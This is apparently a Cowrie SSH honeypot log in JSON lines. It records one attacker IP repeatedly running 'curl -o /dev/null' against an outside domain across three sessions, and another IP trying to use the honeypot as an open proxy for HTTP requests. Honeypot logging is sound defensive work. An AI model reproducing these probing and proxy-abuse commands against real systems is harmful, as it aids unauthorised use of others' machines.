{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.532860Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.640272Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.839814Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.875401Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:28.918859Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:28.958018Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:29.367746Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:30.043268Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:30.063022Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:30.254088Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:30.266943Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:30.493079Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:30.576003Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15179,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15179","sensor":"my-vps","timestamp":"2025-08-31T09:01:30.827783Z","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:31.283759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:31.461273Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:32.060732Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:32.751280Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:32.757258Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:32.880689Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:32.946782Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:33.129837Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:33.134093Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T09:01:33.170790Z","src_ip":"77.83.207.83","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:34.194715Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:34.272185Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:34.457965Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:34.749065Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:35.192952Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:35.240648Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:35.382573Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:35.441192Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:35.603219Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:35.618635Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15117,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15117","sensor":"my-vps","timestamp":"2025-08-31T09:01:35.767521Z","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:35.956948Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:36.126585Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:37.595798Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:37.622588Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:37.781864Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:37.821878Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:37.956682Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:37.979298Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T09:01:38.099626Z","src_ip":"77.83.207.83","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:38.526115Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:38.621509Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:38.758945Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:39.335820Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:39.346760Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:39.387629Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:39.390579Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:39.423427Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:39.424469Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":14403,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14403","sensor":"my-vps","timestamp":"2025-08-31T09:01:39.426778Z","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:39.475634Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:39.570824Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:39.661371Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:40.682023Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:40.740411Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:40.882750Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:40.960941Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:41.046949Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:41.073635Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T09:01:41.177775Z","src_ip":"77.83.207.83","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:41.936295Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.280028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","size":0,"shasum":"db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","duplicate":true,"duration":"7.4","message":"Closing TTY Log: var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.560962Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","size":0,"shasum":"db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","duplicate":true,"duration":"5.0","message":"Closing TTY Log: var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.618158Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","size":0,"shasum":"db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","duplicate":true,"duration":"3.3","message":"Closing TTY Log: var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.678627Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","size":0,"shasum":"db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","duplicate":true,"duration":"2.2","message":"Closing TTY Log: var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.832050Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.closed","duration":"97.3","message":"Connection lost after 97.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.869965Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","size":0,"shasum":"db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","duplicate":true,"duration":"3.5","message":"Closing TTY Log: var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.878938Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
